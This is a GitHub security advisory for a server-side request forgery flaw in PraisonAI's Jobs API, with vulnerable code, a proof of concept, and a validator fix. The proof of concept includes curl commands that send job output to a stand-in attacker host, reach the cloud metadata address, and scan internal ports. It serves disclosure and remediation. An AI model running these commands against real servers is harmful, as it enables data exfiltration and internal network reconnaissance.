GHSA-8FRJ-8Q3M-XHGM
Vulnerability from github – Published: 2026-04-10 19:28 – Updated: 2026-04-10 19:28

Summary
The /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services.
Details
The vulnerability exists across the full request lifecycle:
1. User input accepted without validation — models.py:32:
```python
class JobSubmitRequest(BaseModel):
    webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")
```
The field is a plain str with no URL validation — no scheme restriction, no host filtering.
2. Stored directly on the Job object — router.py:80-86:
```python
job = Job(
    prompt=body.prompt,
    ...
    webhook_url=body.webhook_url,
    ...
)
```
3. Used in an outbound HTTP request — executor.py:385-415:
```python
async def _send_webhook(self, job: Job):
    if not job.webhook_url:
        return
    try:
        import httpx
        payload = {
            "job_id": job.id,
            "status": job.status.value,
            "result": job.result if job.status == JobStatus.SUCCEEDED else None,
            "error": job.error if job.status == JobStatus.FAILED else None,
            ...
        }
        async with httpx.AsyncClient(timeout=30.0) as client:
            response = await client.post(
                job.webhook_url,  # <-- attacker-controlled URL
                json=payload,
                headers={"Content-Type": "application/json"}
            )
```
4. Triggered on both success and failure paths — executor.py:180-205:
```python
# Line 180-181: on success
if job.webhook_url:
    await self._send_webhook(job)

# Line 204-205: on failure
if job.webhook_url:
    await self._send_webhook(job)
```
5. No authentication on the Jobs API server — server.py:82-101:
The create_app() function creates a FastAPI app with CORS allowing all origins (["*"]) and no authentication middleware. The jobs router is mounted directly with no auth dependencies.
There is zero URL validation anywhere in the chain: no scheme check (allows http://, https://, and any scheme httpx supports), no private/internal IP filtering, and no allowlist.
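The absence of these checks is easy to demonstrate. The sketch below is illustrative code, not part of PraisonAI (the function name is hypothetical); it implements the minimal scheme-and-IP-literal filter the chain lacks, and shows which of the PoC URLs it would have rejected:

```python
import ipaddress
from urllib.parse import urlparse

def is_obviously_unsafe(url: str) -> bool:
    """Return True if the URL fails even a minimal webhook filter:
    non-http(s) scheme, missing host, or an IP literal in a
    private/loopback/link-local/reserved range."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return True
    host = parsed.hostname
    if not host:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name, not an IP literal: passes this filter, so a
        # resolve-time check is still required (see Recommended Fix).
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved

# The metadata and internal-network URLs from the PoC fail the filter:
print(is_obviously_unsafe("http://169.254.169.254/latest/meta-data/"))  # True
print(is_obviously_unsafe("http://10.0.0.1:6379/"))                     # True
print(is_obviously_unsafe("https://hooks.example.com/notify"))          # False
```

Note the DNS-name case deliberately passes: a hostname-level filter alone cannot stop a name that resolves to an internal address, which is why the fix below also validates at resolution time.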
PoC
Step 1: Start a listener to observe SSRF requests
```bash
# In a separate terminal, start a simple HTTP listener
python3 -c "
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length)
        print('Received POST from PraisonAI server:')
        print(json.dumps(json.loads(body), indent=2))
        self.send_response(200)
        self.end_headers()

HTTPServer(('0.0.0.0', 9999), Handler).serve_forever()
"
```
Step 2: Submit a job with a malicious webhook_url
```bash
# Point webhook to attacker-controlled server
curl -X POST http://localhost:8005/api/v1/runs \
  -H 'Content-Type: application/json' \
  -d '{
    "prompt": "say hello",
    "webhook_url": "http://attacker.example.com:9999/steal"
  }'
```
Step 3: Target internal services (cloud metadata)
```bash
# Attempt to reach AWS metadata service
curl -X POST http://localhost:8005/api/v1/runs \
  -H 'Content-Type: application/json' \
  -d '{
    "prompt": "say hello",
    "webhook_url": "http://169.254.169.254/latest/meta-data/"
  }'
```
Step 4: Internal network port scanning
```bash
# Scan internal services by observing response timing
for port in 80 443 5432 6379 8080 9200; do
  curl -s -X POST http://localhost:8005/api/v1/runs \
    -H 'Content-Type: application/json' \
    -d "{
      \"prompt\": \"say hello\",
      \"webhook_url\": \"http://10.0.0.1:${port}/\"
    }"
done
```
When each job completes, the server POSTs the full job result payload (including agent output, error messages, and execution metrics) to the specified URL.
Impact
1. SSRF to internal services: The server will send POST requests to any host/port reachable from the server's network, allowing interaction with internal APIs, databases, and cloud infrastructure that are not meant to be externally accessible.
2. Cloud metadata access: In cloud deployments (AWS, GCP, Azure), the server can be directed to POST to metadata endpoints (169.254.169.254, metadata.google.internal), potentially triggering actions or leaking information depending on the metadata service's POST handling.
3. Internal network reconnaissance: By submitting jobs with webhook URLs pointing to various internal hosts and ports, an attacker can discover internal services based on timing differences and error patterns in job logs.
4. Data exfiltration: The webhook payload includes the full job result (agent output), which may contain sensitive data processed by the agent. By pointing the webhook to an attacker-controlled server, this data is exfiltrated.
5. No authentication barrier: The Jobs API server has no authentication by default, meaning any network-reachable attacker can exploit this without credentials.
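The reconnaissance in item 3 amounts to a timing heuristic. The classifier below is a hypothetical sketch (the function and thresholds are not part of the advisory's PoC), assuming the executor's 30-second httpx timeout:

```python
def classify_port(elapsed_seconds: float, timeout: float = 30.0) -> str:
    """Infer a target port's likely state from how long webhook delivery took.

    A near-instant failure usually means the target actively refused the
    connection (host up, port closed); hitting the client timeout suggests
    a filtered port or unreachable host; anything in between typically
    means something accepted the connection."""
    if elapsed_seconds >= timeout:
        return "filtered/unreachable"
    if elapsed_seconds < 0.5:
        return "closed (refused)"
    return "open or slow service"
```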
Recommended Fix
Add URL validation to restrict webhook URLs to safe destinations. In models.py, add a Pydantic validator:
```python
from typing import Optional

from pydantic import BaseModel, Field, field_validator
from urllib.parse import urlparse
import ipaddress

class JobSubmitRequest(BaseModel):
    webhook_url: Optional[str] = Field(None, description="URL to POST results when complete")

    @field_validator("webhook_url")
    @classmethod
    def validate_webhook_url(cls, v: Optional[str]) -> Optional[str]:
        if v is None:
            return v

        parsed = urlparse(v)

        # Only allow http and https schemes
        if parsed.scheme not in ("http", "https"):
            raise ValueError("webhook_url must use http or https scheme")

        # Block private/internal IP ranges
        hostname = parsed.hostname
        if not hostname:
            raise ValueError("webhook_url must have a valid hostname")

        try:
            ip = ipaddress.ip_address(hostname)
            if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
                raise ValueError("webhook_url must not point to private/internal addresses")
        except ValueError as e:
            if "must not point" in str(e):
                raise
            # hostname is not an IP literal — defer to resolve-time checks
            pass

        return v
```
Additionally, in executor.py, add DNS resolution validation before making the request to prevent DNS rebinding:
```python
async def _send_webhook(self, job: Job):
    if not job.webhook_url:
        return

    # Validate resolved IP is not private (prevent DNS rebinding)
    from urllib.parse import urlparse
    import socket, ipaddress

    parsed = urlparse(job.webhook_url)
    try:
        default_port = 443 if parsed.scheme == "https" else 80
        resolved_ip = socket.getaddrinfo(parsed.hostname, parsed.port or default_port)[0][4][0]
        ip = ipaddress.ip_address(resolved_ip)
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            logger.warning(f"Webhook blocked for {job.id}: resolved to private IP {resolved_ip}")
            return
    except (socket.gaierror, ValueError):
        logger.warning(f"Webhook blocked for {job.id}: could not resolve {parsed.hostname}")
        return

    # ... proceed with httpx.AsyncClient.post() ...
```
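The snippet above checks only the first resolved address. A slightly more defensive variant (a sketch with a hypothetical helper name, written with an injectable resolver so it can be exercised without network access) vets every address the resolver returns:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def resolve_and_check(url: str, resolver=socket.getaddrinfo):
    """Resolve the webhook host once and vet every returned address.

    Returns the list of resolved public IPs to connect to, or None if the
    host is missing, resolution fails, or any address falls in a
    private/loopback/link-local/reserved range. Connecting to a returned
    IP (rather than re-resolving) closes the DNS-rebinding window."""
    parsed = urlparse(url)
    if not parsed.hostname:
        return None
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    try:
        infos = resolver(parsed.hostname, port)
    except (socket.gaierror, OSError):
        return None
    ips = []
    for _family, _type, _proto, _canon, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return None
        ips.append(str(ip))
    return ips
```

To fully close the rebinding window, the HTTP client should then connect to one of the vetted IPs while sending the original hostname in the Host header (or via SNI), rather than letting the client perform a second, independent DNS lookup.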
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "PraisonAI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.128"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-40114"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T19:28:54Z",
"nvd_published_at": "2026-04-09T22:16:35Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `/api/v1/runs` endpoint accepts an arbitrary `webhook_url` in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using `httpx.AsyncClient`. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services.\n\n## Details\n\nThe vulnerability exists across the full request lifecycle:\n\n**1. User input accepted without validation** \u2014 `models.py:32`:\n```python\nclass JobSubmitRequest(BaseModel):\n webhook_url: Optional[str] = Field(None, description=\"URL to POST results when complete\")\n```\nThe field is a plain `str` with no URL validation \u2014 no scheme restriction, no host filtering.\n\n**2. Stored directly on the Job object** \u2014 `router.py:80-86`:\n```python\njob = Job(\n prompt=body.prompt,\n ...\n webhook_url=body.webhook_url,\n ...\n)\n```\n\n**3. Used in an outbound HTTP request** \u2014 `executor.py:385-415`:\n```python\nasync def _send_webhook(self, job: Job):\n if not job.webhook_url:\n return\n try:\n import httpx\n payload = {\n \"job_id\": job.id,\n \"status\": job.status.value,\n \"result\": job.result if job.status == JobStatus.SUCCEEDED else None,\n \"error\": job.error if job.status == JobStatus.FAILED else None,\n ...\n }\n async with httpx.AsyncClient(timeout=30.0) as client:\n response = await client.post(\n job.webhook_url, # \u003c-- attacker-controlled URL\n json=payload,\n headers={\"Content-Type\": \"application/json\"}\n )\n```\n\n**4. Triggered on both success and failure paths** \u2014 `executor.py:180-205`:\n```python\n# Line 180-181: on success\nif job.webhook_url:\n await self._send_webhook(job)\n\n# Line 204-205: on failure\nif job.webhook_url:\n await self._send_webhook(job)\n```\n\n**5. 
No authentication on the Jobs API server** \u2014 `server.py:82-101`:\nThe `create_app()` function creates a FastAPI app with CORS allowing all origins (`[\"*\"]`) and no authentication middleware. The jobs router is mounted directly with no auth dependencies.\n\nThere is zero URL validation anywhere in the chain: no scheme check (allows `http://`, `https://`, and any scheme httpx supports), no private/internal IP filtering, and no allowlist.\n\n## PoC\n\n**Step 1: Start a listener to observe SSRF requests**\n```bash\n# In a separate terminal, start a simple HTTP listener\npython3 -c \"\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport json\n\nclass Handler(BaseHTTPRequestHandler):\n def do_POST(self):\n length = int(self.headers.get(\u0027Content-Length\u0027, 0))\n body = self.rfile.read(length)\n print(f\u0027Received POST from PraisonAI server:\u0027)\n print(json.dumps(json.loads(body), indent=2))\n self.send_response(200)\n self.end_headers()\n\nHTTPServer((\u00270.0.0.0\u0027, 9999), Handler).serve_forever()\n\"\n```\n\n**Step 2: Submit a job with a malicious webhook_url**\n```bash\n# Point webhook to attacker-controlled server\ncurl -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"prompt\": \"say hello\",\n \"webhook_url\": \"http://attacker.example.com:9999/steal\"\n }\u0027\n```\n\n**Step 3: Target internal services (cloud metadata)**\n```bash\n# Attempt to reach AWS metadata service\ncurl -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\n \"prompt\": \"say hello\",\n \"webhook_url\": \"http://169.254.169.254/latest/meta-data/\"\n }\u0027\n```\n\n**Step 4: Internal network port scanning**\n```bash\n# Scan internal services by observing response timing\nfor port in 80 443 5432 6379 8080 9200; do\n curl -s -X POST http://localhost:8005/api/v1/runs \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n 
\\\"prompt\\\": \\\"say hello\\\",\n \\\"webhook_url\\\": \\\"http://10.0.0.1:${port}/\\\"\n }\"\ndone\n```\n\nWhen each job completes, the server POSTs the full job result payload (including agent output, error messages, and execution metrics) to the specified URL.\n\n## Impact\n\n1. **SSRF to internal services**: The server will send POST requests to any host/port reachable from the server\u0027s network, allowing interaction with internal APIs, databases, and cloud infrastructure that are not meant to be externally accessible.\n\n2. **Cloud metadata access**: In cloud deployments (AWS, GCP, Azure), the server can be directed to POST to metadata endpoints (`169.254.169.254`, `metadata.google.internal`), potentially triggering actions or leaking information depending on the metadata service\u0027s POST handling.\n\n3. **Internal network reconnaissance**: By submitting jobs with webhook URLs pointing to various internal hosts and ports, an attacker can discover internal services based on timing differences and error patterns in job logs.\n\n4. **Data exfiltration**: The webhook payload includes the full job result (agent output), which may contain sensitive data processed by the agent. By pointing the webhook to an attacker-controlled server, this data is exfiltrated.\n\n5. **No authentication barrier**: The Jobs API server has no authentication by default, meaning any network-reachable attacker can exploit this without credentials.\n\n## Recommended Fix\n\nAdd URL validation to restrict webhook URLs to safe destinations. 
In `models.py`, add a Pydantic validator:\n\n```python\nfrom pydantic import BaseModel, Field, field_validator\nfrom urllib.parse import urlparse\nimport ipaddress\n\nclass JobSubmitRequest(BaseModel):\n webhook_url: Optional[str] = Field(None, description=\"URL to POST results when complete\")\n\n @field_validator(\"webhook_url\")\n @classmethod\n def validate_webhook_url(cls, v: Optional[str]) -\u003e Optional[str]:\n if v is None:\n return v\n \n parsed = urlparse(v)\n \n # Only allow http and https schemes\n if parsed.scheme not in (\"http\", \"https\"):\n raise ValueError(\"webhook_url must use http or https scheme\")\n \n # Block private/internal IP ranges\n hostname = parsed.hostname\n if not hostname:\n raise ValueError(\"webhook_url must have a valid hostname\")\n \n try:\n ip = ipaddress.ip_address(hostname)\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n raise ValueError(\"webhook_url must not point to private/internal addresses\")\n except ValueError as e:\n if \"must not point\" in str(e):\n raise\n # hostname is not an IP \u2014 resolve and check\n pass\n \n return v\n```\n\nAdditionally, in `executor.py`, add DNS resolution validation before making the request to prevent DNS rebinding:\n\n```python\nasync def _send_webhook(self, job: Job):\n if not job.webhook_url:\n return\n \n # Validate resolved IP is not private (prevent DNS rebinding)\n from urllib.parse import urlparse\n import socket, ipaddress\n \n parsed = urlparse(job.webhook_url)\n try:\n resolved_ip = socket.getaddrinfo(parsed.hostname, parsed.port or 443)[0][4][0]\n ip = ipaddress.ip_address(resolved_ip)\n if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:\n logger.warning(f\"Webhook blocked for {job.id}: resolved to private IP {resolved_ip}\")\n return\n except (socket.gaierror, ValueError):\n logger.warning(f\"Webhook blocked for {job.id}: could not resolve {parsed.hostname}\")\n return\n \n # ... 
proceed with httpx.AsyncClient.post() ...\n```",
"id": "GHSA-8frj-8q3m-xhgm",
"modified": "2026-04-10T19:28:54Z",
"published": "2026-04-10T19:28:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40114"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI Vulnerable to Server-Side Request Forgery via Unvalidated webhook_url in Jobs API"
}